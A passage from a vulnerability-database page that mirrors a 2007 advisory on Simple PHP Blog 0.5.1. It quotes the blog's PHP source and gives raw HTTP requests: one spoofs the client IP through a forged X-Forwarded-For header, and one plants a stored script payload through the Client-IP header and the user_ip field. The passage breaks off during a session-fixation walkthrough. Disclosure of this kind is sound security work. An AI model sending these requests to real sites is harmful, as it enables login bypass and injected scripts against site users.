Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities

🗓️ 23 Oct 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 14 Views

Simple PHP Blog (sphpblog) <= 0.5.1 Multiple Vulnerabilities. Medium/High risk. IP Spoofing, Cross Site Scripting, Session Fixation, CRLF Injection, File Inclusion, File Deletion, File Upload Vulnerability, Code Execution

Code

                                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Title:&nbsp;&nbsp;&nbsp;Simple&nbsp;PHP&nbsp;Blog&nbsp;(sphpblog)&nbsp;&lt;=&nbsp;0.5.1&nbsp;Multiple&nbsp;Vulnerabilities
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Vendor:&nbsp;&nbsp;&nbsp;http://sourceforge.net/projects/sphpblog/

&nbsp;&nbsp;&nbsp;&nbsp;Advisory:&nbsp;&nbsp;&nbsp;http://acid-root.new.fr/?0:15
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Author:&nbsp;&nbsp;&nbsp;DarkFig&nbsp;&lt;&nbsp;gmdarkfig&nbsp;(at)&nbsp;gmail&nbsp;(dot)&nbsp;com&nbsp;&gt;

&nbsp;Released&nbsp;on:&nbsp;&nbsp;&nbsp;2007/10/21
&nbsp;&nbsp;&nbsp;Changelog:&nbsp;&nbsp;&nbsp;----------
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;L&nbsp;&nbsp;&nbsp;M&nbsp;&nbsp;&nbsp;H&nbsp;&nbsp;&nbsp;T
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Summary:&nbsp;&nbsp;&nbsp;Ip&nbsp;Spoofing&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[X]&nbsp;[_]&nbsp;[_]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Cross&nbsp;Site&nbsp;Scripting&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[X]&nbsp;[_]&nbsp;[_]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Session&nbsp;Fixation&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[X]&nbsp;[_]&nbsp;[_]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mail()&nbsp;CRLF&nbsp;Injection&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[X]&nbsp;[_]&nbsp;[_]&nbsp;[_]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Local&nbsp;File&nbsp;Inclusion&nbsp;(+CSRF)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[_]&nbsp;[X]&nbsp;[_]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;File&nbsp;Deletion&nbsp;(+CSRF)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[_]&nbsp;[X]&nbsp;[_]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;File&nbsp;Upload&nbsp;Vulnerability&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[_]&nbsp;[_]&nbsp;[X]&nbsp;[X]
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Code&nbsp;Execution&nbsp;(+CSRF)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[_]&nbsp;[_]&nbsp;[X]&nbsp;[X]

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Legend:&nbsp;&nbsp;&nbsp;L&nbsp;-&nbsp;Low&nbsp;risk&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;M&nbsp;-&nbsp;Medium&nbsp;risk
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;H&nbsp;-&nbsp;High&nbsp;risk&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;T&nbsp;-&nbsp;Tested

&nbsp;&nbsp;Risk&nbsp;level:&nbsp;&nbsp;&nbsp;Medium&nbsp;/&nbsp;High
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;CVE:&nbsp;&nbsp;&nbsp;----------



&nbsp;&nbsp;I&nbsp;-&nbsp;IP&nbsp;SPOOFING

&nbsp;&nbsp;The&nbsp;file&nbsp;&quot;scripts/sb_communicate.php&quot;&nbsp;contains&nbsp;the&nbsp;following
&nbsp;&nbsp;code:&nbsp;

&nbsp;&nbsp;19|&nbsp;function&nbsp;getIP()&nbsp;{
&nbsp;&nbsp;20|&nbsp;&nbsp;if&nbsp;(&nbsp;!empty&nbsp;(&nbsp;$_SERVER[&nbsp;'HTTP_CLIENT_IP'&nbsp;]&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;21|&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;$_SERVER[&nbsp;'HTTP_CLIENT_IP'&nbsp;];
&nbsp;&nbsp;22|&nbsp;&nbsp;}
&nbsp;&nbsp;23|&nbsp;&nbsp;else&nbsp;if&nbsp;(&nbsp;!empty&nbsp;(&nbsp;$_SERVER[&nbsp;'HTTP_X_FORWARDED_FOR'&nbsp;]&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;24|&nbsp;&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;$_SERVER[&nbsp;'HTTP_X_FORWARDED_FOR'&nbsp;];
&nbsp;&nbsp;25|&nbsp;&nbsp;}
&nbsp;&nbsp;26|&nbsp;&nbsp;else&nbsp;if&nbsp;(&nbsp;!empty&nbsp;(&nbsp;$_SERVER[&nbsp;'REMOTE_ADDR'&nbsp;]&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;27|&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;$_SERVER[&nbsp;'REMOTE_ADDR'&nbsp;];
&nbsp;&nbsp;28|&nbsp;&nbsp;}
&nbsp;&nbsp;29|&nbsp;&nbsp;else&nbsp;if&nbsp;(&nbsp;getenv(&nbsp;&quot;HTTP_CLIENT_IP&quot;&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;30|&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;getenv(&nbsp;&quot;HTTP_CLIENT_IP&quot;&nbsp;);
&nbsp;&nbsp;31|&nbsp;&nbsp;}
&nbsp;&nbsp;32|&nbsp;&nbsp;else&nbsp;if&nbsp;(&nbsp;getenv(&nbsp;&quot;HTTP_X_FORWARDED_FOR&quot;&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;33|&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;getenv(&nbsp;&quot;HTTP_X_FORWARDED_FOR&quot;&nbsp;);
&nbsp;&nbsp;34|&nbsp;&nbsp;}
&nbsp;&nbsp;35|&nbsp;&nbsp;else&nbsp;if&nbsp;(&nbsp;getenv(&nbsp;&quot;REMOTE_ADDR&quot;)&nbsp;)&nbsp;{
&nbsp;&nbsp;36|&nbsp;&nbsp;&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;getenv(&nbsp;&quot;REMOTE_ADDR&quot;&nbsp;);
&nbsp;&nbsp;37|&nbsp;&nbsp;}
&nbsp;&nbsp;38|&nbsp;&nbsp;else&nbsp;{&nbsp;
&nbsp;&nbsp;39|&nbsp;	&nbsp;&nbsp;$ip&nbsp;=&nbsp;&quot;UNKNOWN&quot;;
&nbsp;&nbsp;40|&nbsp;&nbsp;}
&nbsp;&nbsp;41|&nbsp;&nbsp;return(&nbsp;$ip&nbsp;);
&nbsp;&nbsp;42|&nbsp;&nbsp;}

&nbsp;&nbsp;So,&nbsp;an&nbsp;attacker&nbsp;can&nbsp;spoof&nbsp;his&nbsp;IP,&nbsp;he&nbsp;just&nbsp;have&nbsp;to&nbsp;create
&nbsp;&nbsp;an&nbsp;HTTP&nbsp;packet,&nbsp;add&nbsp;a&nbsp;special&nbsp;header,&nbsp;and&nbsp;send&nbsp;it.&nbsp;The
&nbsp;&nbsp;HTTP&nbsp;packet&nbsp;will&nbsp;look's&nbsp;like&nbsp;this:
&nbsp;&nbsp;
&nbsp;&nbsp;GET&nbsp;/index.php&nbsp;HTTP/1.1\r\n
&nbsp;&nbsp;Host:&nbsp;localhost\r\n
&nbsp;&nbsp;X-Forwarded-For:&nbsp;127.0.0.1\r\n
&nbsp;&nbsp;Connection:&nbsp;keep-alive\r\n\r\n
&nbsp;&nbsp;
&nbsp;&nbsp;Later,&nbsp;we'll&nbsp;see&nbsp;how&nbsp;to&nbsp;gain&nbsp;the&nbsp;administrator's&nbsp;session
&nbsp;&nbsp;id.&nbsp;Even&nbsp;if&nbsp;we&nbsp;got&nbsp;the&nbsp;good&nbsp;session&nbsp;id,&nbsp;there&nbsp;is&nbsp;a
&nbsp;&nbsp;protection&nbsp;that&nbsp;&quot;normally&quot;&nbsp;don't&nbsp;permit&nbsp;to&nbsp;be&nbsp;logged&nbsp;in.
&nbsp;&nbsp;Let's&nbsp;see&nbsp;a&nbsp;part&nbsp;of&nbsp;the&nbsp;file&nbsp;&quot;scripts/sb_login.php&quot;:
&nbsp;&nbsp;
&nbsp;&nbsp;28|&nbsp;//&nbsp;Check&nbsp;if&nbsp;user&nbsp;is&nbsp;logged&nbsp;in.
&nbsp;&nbsp;29|&nbsp;if&nbsp;(&nbsp;isset(&nbsp;$_SESSION[&nbsp;'logged_in'&nbsp;]&nbsp;)&nbsp;&amp;&amp;
&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_SESSION[&nbsp;'logged_in'&nbsp;]&nbsp;==&nbsp;'yes'&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;30|&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_SESSION[&nbsp;'site_path'&nbsp;]&nbsp;===
&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dirname($_SERVER[&nbsp;'PHP_SELF'&nbsp;])&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;31|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_SESSION[&nbsp;'ip'&nbsp;]&nbsp;===&nbsp;getIP()&nbsp;)&nbsp;{
&nbsp;&nbsp;32|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;User&nbsp;is&nbsp;logged&nbsp;in.
&nbsp;&nbsp;33|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return&nbsp;(&nbsp;true&nbsp;);
&nbsp;&nbsp;34|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;35|&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;36|&nbsp;}
&nbsp;&nbsp;
&nbsp;&nbsp;Thanks&nbsp;to&nbsp;the&nbsp;getIP()&nbsp;function,&nbsp;if&nbsp;we&nbsp;know&nbsp;the
&nbsp;&nbsp;administrator's&nbsp;IP&nbsp;(later&nbsp;we'll&nbsp;see&nbsp;how&nbsp;to&nbsp;get&nbsp;it&nbsp;easily),
&nbsp;&nbsp;we&nbsp;can&nbsp;bypass&nbsp;the&nbsp;third&nbsp;condition.



&nbsp;&nbsp;II&nbsp;-&nbsp;CROSS&nbsp;SITE&nbsp;SCRIPTING

&nbsp;&nbsp;When&nbsp;a&nbsp;guest&nbsp;add&nbsp;a&nbsp;comment,&nbsp;an&nbsp;HTTP&nbsp;packet&nbsp;is&nbsp;sent&nbsp;to
&nbsp;&nbsp;&quot;comment_add_cgi.php&quot;.&nbsp;Before&nbsp;writing&nbsp;the&nbsp;comment&nbsp;into
&nbsp;&nbsp;a&nbsp;file,&nbsp;there&nbsp;is&nbsp;some&nbsp;conditions,&nbsp;the&nbsp;first&nbsp;condition&nbsp;is
&nbsp;&nbsp;that&nbsp;the&nbsp;IP&nbsp;sent&nbsp;with&nbsp;the&nbsp;POST&nbsp;method,&nbsp;must&nbsp;be&nbsp;the&nbsp;same
&nbsp;&nbsp;as&nbsp;the&nbsp;IP&nbsp;returned&nbsp;by&nbsp;the&nbsp;getIP()&nbsp;function.&nbsp;Let's&nbsp;see
&nbsp;&nbsp;the&nbsp;code:

&nbsp;&nbsp;88|&nbsp;if&nbsp;($ok)&nbsp;{
&nbsp;&nbsp;89|&nbsp;	//&nbsp;Verify&nbsp;that&nbsp;posted&nbsp;IP&nbsp;and&nbsp;actual&nbsp;IP&nbsp;matches.
&nbsp;&nbsp;90|&nbsp;	if&nbsp;(&nbsp;getIP()&nbsp;===&nbsp;$_POST['user_ip']&nbsp;)&nbsp;{
&nbsp;&nbsp;91|&nbsp;		$ipMatches&nbsp;=&nbsp;true;
&nbsp;&nbsp;92|&nbsp;	}&nbsp;else&nbsp;{
&nbsp;&nbsp;93|&nbsp;		$ipMatches&nbsp;=&nbsp;false;
&nbsp;&nbsp;94|&nbsp;		$ok&nbsp;=&nbsp;false;
&nbsp;&nbsp;95|&nbsp;		$error_message&nbsp;=&nbsp;$lang_string[&nbsp;'error_no_match'&nbsp;];
&nbsp;&nbsp;96|&nbsp;	}
&nbsp;&nbsp;97|&nbsp;}

&nbsp;&nbsp;This&nbsp;is&nbsp;useless,&nbsp;I&nbsp;don't&nbsp;know&nbsp;what&nbsp;the&nbsp;author&nbsp;wanted&nbsp;to
&nbsp;&nbsp;do&nbsp;but&nbsp;this&nbsp;can&nbsp;be&nbsp;bypassed&nbsp;easily.&nbsp;After&nbsp;some&nbsp;conditions,
&nbsp;&nbsp;the&nbsp;write_comment()&nbsp;function&nbsp;is&nbsp;called:
&nbsp;&nbsp;
&nbsp;&nbsp;219|&nbsp;$result&nbsp;=&nbsp;write_comment(&nbsp;$_POST[&nbsp;'y'&nbsp;],&nbsp;$_POST[&nbsp;'m'&nbsp;],
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_POST[&nbsp;'entry'&nbsp;],
&nbsp;&nbsp;220|&nbsp;		$comment_name,
&nbsp;&nbsp;221|&nbsp;		$comment_email,
&nbsp;&nbsp;222|&nbsp;		$comment_url,
&nbsp;&nbsp;223|&nbsp;		$comment_text,
&nbsp;&nbsp;224|&nbsp;		$_POST[&nbsp;'user_ip'&nbsp;],
&nbsp;&nbsp;225|&nbsp;		$moderationFlag,
&nbsp;&nbsp;226|&nbsp;		time()&nbsp;);

&nbsp;&nbsp;This&nbsp;function&nbsp;is&nbsp;situated&nbsp;in&nbsp;&quot;scripts/sb_comments.php&quot;.
&nbsp;&nbsp;Let's&nbsp;see&nbsp;the&nbsp;data&nbsp;which&nbsp;will&nbsp;be&nbsp;stored&nbsp;in&nbsp;a&nbsp;file:

&nbsp;&nbsp;519|&nbsp;//&nbsp;Save&nbsp;the&nbsp;file
&nbsp;&nbsp;520|&nbsp;$save_data&nbsp;=&nbsp;array();
&nbsp;&nbsp;521|&nbsp;$save_data[&nbsp;'VERSION'&nbsp;]&nbsp;=&nbsp;$sb_info[&nbsp;'version'&nbsp;];
&nbsp;&nbsp;522|&nbsp;$save_data[&nbsp;'NAME'&nbsp;]&nbsp;=&nbsp;clean_post_text(&nbsp;$comment_name&nbsp;);
&nbsp;&nbsp;523|&nbsp;$save_data[&nbsp;'DATE'&nbsp;]&nbsp;=&nbsp;$comment_date;
&nbsp;&nbsp;524|&nbsp;$save_data[&nbsp;'CONTENT'&nbsp;]&nbsp;=&nbsp;sb_parse_url(&nbsp;clean_post_text(&nbsp;$comment_text&nbsp;)&nbsp;);
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;525|&nbsp;if&nbsp;(&nbsp;$comment_email&nbsp;!=&nbsp;''&nbsp;)&nbsp;{
&nbsp;&nbsp;526|&nbsp;&nbsp;&nbsp;$save_data[&nbsp;'EMAIL'&nbsp;]&nbsp;=&nbsp;clean_post_text(&nbsp;$comment_email&nbsp;);
&nbsp;&nbsp;527|&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;528|&nbsp;if&nbsp;(&nbsp;$comment_url&nbsp;!=&nbsp;''&nbsp;)&nbsp;{
&nbsp;&nbsp;529|&nbsp;&nbsp;&nbsp;$save_data[&nbsp;'URL'&nbsp;]&nbsp;=&nbsp;clean_post_text(&nbsp;$comment_url&nbsp;);
&nbsp;&nbsp;530|&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;531|&nbsp;$save_data[&nbsp;'IP-ADDRESS'&nbsp;]&nbsp;=&nbsp;$user_ip;&nbsp;//&nbsp;New&nbsp;0.4.8
&nbsp;&nbsp;532|&nbsp;$save_data[&nbsp;'MODERATIONFLAG'&nbsp;]&nbsp;=&nbsp;$hold_flag;
&nbsp;&nbsp;533|&nbsp;
&nbsp;&nbsp;534|&nbsp;//&nbsp;Implode&nbsp;the&nbsp;array
&nbsp;&nbsp;535|&nbsp;$str&nbsp;=&nbsp;implode_with_keys(&nbsp;$save_data&nbsp;);
&nbsp;&nbsp;536|&nbsp;
&nbsp;&nbsp;537|&nbsp;//&nbsp;Save&nbsp;the&nbsp;file
&nbsp;&nbsp;538|&nbsp;$result&nbsp;=&nbsp;sb_write_file(&nbsp;$entryFile,&nbsp;$str&nbsp;);&nbsp;

&nbsp;&nbsp;The&nbsp;clean_post_text()&nbsp;function&nbsp;protect&nbsp;against&nbsp;XSS,&nbsp;it
&nbsp;&nbsp;also&nbsp;replace&nbsp;a&nbsp;string&nbsp;separator&nbsp;(by&nbsp;its&nbsp;html&nbsp;equivalent)
&nbsp;&nbsp;which&nbsp;is&nbsp;used&nbsp;when&nbsp;comment's&nbsp;data&nbsp;are&nbsp;extracted.
&nbsp;&nbsp;This&nbsp;function&nbsp;is&nbsp;in&nbsp;the&nbsp;file&nbsp;&quot;scripts/sb_formatting.php&quot;:

&nbsp;&nbsp;13|&nbsp;function&nbsp;clean_post_text(&nbsp;$str&nbsp;)&nbsp;{
&nbsp;&nbsp;14|&nbsp;	//&nbsp;Cleans&nbsp;post&nbsp;text&nbsp;input.
&nbsp;&nbsp;15|&nbsp;	//
&nbsp;&nbsp;16|&nbsp;	//&nbsp;Strip&nbsp;out&nbsp;and&nbsp;replace&nbsp;pipes&nbsp;with&nbsp;colons.&nbsp;HTML-ize&nbsp;entities.
&nbsp;&nbsp;17|&nbsp;	//&nbsp;Use&nbsp;charset&nbsp;from&nbsp;the&nbsp;language&nbsp;file&nbsp;to&nbsp;make&nbsp;sure&nbsp;we're&nbsp;only
&nbsp;&nbsp;18|&nbsp;	//&nbsp;encoding&nbsp;stuff&nbsp;that&nbsp;needs&nbsp;to&nbsp;be&nbsp;encoded.
&nbsp;&nbsp;19|&nbsp;	//
&nbsp;&nbsp;20|&nbsp;	//&nbsp;This&nbsp;makes&nbsp;entries&nbsp;safe&nbsp;for&nbsp;saving&nbsp;to&nbsp;a&nbsp;file&nbsp;(since&nbsp;the&nbsp;data
&nbsp;&nbsp;21|&nbsp;	//&nbsp;format&nbsp;is&nbsp;pipe&nbsp;delimited.)
&nbsp;&nbsp;22|&nbsp;	global&nbsp;$lang_string;
&nbsp;&nbsp;23|&nbsp;	$str&nbsp;=&nbsp;str_replace(&nbsp;'|',&nbsp;'|',&nbsp;$str&nbsp;);
&nbsp;&nbsp;24|&nbsp;	$str&nbsp;=&nbsp;@htmlspecialchars(&nbsp;$str,&nbsp;ENT_QUOTES,&nbsp;$lang_string[&nbsp;'php_charset'&nbsp;]&nbsp;);
&nbsp;&nbsp;25|&nbsp;
&nbsp;&nbsp;26|&nbsp;	return&nbsp;(&nbsp;$str&nbsp;);
&nbsp;&nbsp;27|&nbsp;}

&nbsp;&nbsp;The&nbsp;clean_post_text()&nbsp;function&nbsp;isn't&nbsp;applied&nbsp;to&nbsp;the
&nbsp;&nbsp;IP&nbsp;address&nbsp;which&nbsp;will&nbsp;be&nbsp;stored&nbsp;in&nbsp;the&nbsp;file.&nbsp;So&nbsp;this
&nbsp;&nbsp;can&nbsp;be&nbsp;exploited&nbsp;to&nbsp;conduct&nbsp;XSS&nbsp;attack.&nbsp;The&nbsp;attacker
&nbsp;&nbsp;will&nbsp;send&nbsp;an&nbsp;HTTP&nbsp;packet&nbsp;like&nbsp;this&nbsp;one:

&nbsp;&nbsp;POST&nbsp;/comment_add_cgi.php&nbsp;HTTP/1.1\r\n
&nbsp;&nbsp;Host:&nbsp;localhost\r\n
&nbsp;&nbsp;Client-IP:&nbsp;&lt;script&gt;alert(666)&lt;/script&gt;\r\n
&nbsp;&nbsp;Connection:&nbsp;keep-alive\r\n
&nbsp;&nbsp;Content-Type:&nbsp;application/x-www-form-urlencoded\r\n
&nbsp;&nbsp;Content-Length:&nbsp;229\r\n\r\n
&nbsp;&nbsp;y=07&amp;m=07&amp;entry=entry070727-161718&amp;comment_name=HereMyName
&nbsp;&nbsp;&amp;comment_email=&amp;comment_url=&amp;user_ip=&lt;script&gt;alert(666)&lt;/script&gt;
&nbsp;&nbsp;&amp;style_dropdown=--&amp;comment_text=This+is+an+example+comment.
&nbsp;&nbsp;&amp;comment_capcha=571560&amp;submit=%A0Post+Comment%A0\r\n\r\n

&nbsp;&nbsp;The&nbsp;sender&nbsp;IP&nbsp;address&nbsp;can&nbsp;be&nbsp;only&nbsp;seen&nbsp;by&nbsp;a&nbsp;registered
&nbsp;&nbsp;user.&nbsp;So&nbsp;the&nbsp;code&nbsp;sent&nbsp;by&nbsp;the&nbsp;attacker&nbsp;will&nbsp;be&nbsp;executed
&nbsp;&nbsp;when&nbsp;a&nbsp;registered&nbsp;user&nbsp;will&nbsp;see&nbsp;the&nbsp;comments&nbsp;page.



&nbsp;&nbsp;III&nbsp;-&nbsp;SESSION&nbsp;FIXATION

&nbsp;&nbsp;In&nbsp;a&nbsp;session&nbsp;fixation&nbsp;attack,&nbsp;the&nbsp;attacker&nbsp;have&nbsp;to&nbsp;set
&nbsp;&nbsp;the&nbsp;victim's&nbsp;session&nbsp;id.&nbsp;In&nbsp;our&nbsp;case,&nbsp;the&nbsp;attacker&nbsp;fix
&nbsp;&nbsp;the&nbsp;user's&nbsp;session&nbsp;id,&nbsp;the&nbsp;victim&nbsp;which&nbsp;is&nbsp;logged&nbsp;in,
&nbsp;&nbsp;will&nbsp;get&nbsp;logged&nbsp;out&nbsp;when&nbsp;the&nbsp;cookie&nbsp;will&nbsp;be&nbsp;set,&nbsp;then
&nbsp;&nbsp;if&nbsp;the&nbsp;victim&nbsp;try&nbsp;to&nbsp;log&nbsp;in,&nbsp;the&nbsp;session&nbsp;id&nbsp;will&nbsp;be
&nbsp;&nbsp;registered&nbsp;on&nbsp;the&nbsp;server.&nbsp;Let's&nbsp;see&nbsp;a&nbsp;part&nbsp;of&nbsp;the
&nbsp;&nbsp;logged_in()&nbsp;function:

&nbsp;&nbsp;11|&nbsp;function&nbsp;logged_in&nbsp;(&nbsp;$redirect_to_login,&nbsp;$redirect_to_setup&nbsp;)&nbsp;{
&nbsp;&nbsp;12|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;13|&nbsp;&nbsp;&nbsp;//&nbsp;Turn&nbsp;off&nbsp;URL&nbsp;SIDs.
&nbsp;&nbsp;14|&nbsp;&nbsp;&nbsp;ini_set('url_rewriter.tags','');
&nbsp;&nbsp;15|&nbsp;&nbsp;&nbsp;ini_set('session.use_trans_sid',&nbsp;false);
&nbsp;&nbsp;16|&nbsp;
&nbsp;&nbsp;17|&nbsp;&nbsp;&nbsp;//&nbsp;Init&nbsp;the&nbsp;session.
&nbsp;&nbsp;18|&nbsp;&nbsp;&nbsp;session_set_cookie_params(60*60*24*5);
&nbsp;&nbsp;19|&nbsp;
&nbsp;&nbsp;20|&nbsp;&nbsp;&nbsp;//&nbsp;Check&nbsp;if&nbsp;the&nbsp;user&nbsp;has&nbsp;a&nbsp;client-side&nbsp;cookie.
&nbsp;&nbsp;21|&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;isset(&nbsp;$_COOKIE[&nbsp;'sid'&nbsp;]&nbsp;)&nbsp;)&nbsp;{
&nbsp;&nbsp;22|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;session_id($_COOKIE[&nbsp;'sid'&nbsp;]);
&nbsp;&nbsp;23|&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;24|&nbsp;
&nbsp;&nbsp;25|&nbsp;&nbsp;&nbsp;//&nbsp;Start&nbsp;the&nbsp;session.
&nbsp;&nbsp;26|&nbsp;&nbsp;&nbsp;session_start&nbsp;();
&nbsp;&nbsp;27|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;28|&nbsp;//&nbsp;Check&nbsp;if&nbsp;user&nbsp;is&nbsp;logged&nbsp;in.
&nbsp;&nbsp;29|&nbsp;if&nbsp;(&nbsp;isset(&nbsp;$_SESSION[&nbsp;'logged_in'&nbsp;]&nbsp;)&nbsp;&amp;&amp;
&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$_SESSION[&nbsp;'logged_in'&nbsp;]&nbsp;==&nbsp;'yes'&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;30|&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_SESSION[&nbsp;'site_path'&nbsp;]&nbsp;===
&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;dirname($_SERVER[&nbsp;'PHP_SELF'&nbsp;])&nbsp;)&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;|
&nbsp;&nbsp;31|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if&nbsp;(&nbsp;$_SESSION[&nbsp;'ip'&nbsp;]&nbsp;===&nbsp;getIP()&nbsp;)&nbsp;{
&nbsp;&nbsp;32|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;//&nbsp;User&nbsp;is&nbsp;logged&nbsp;in.
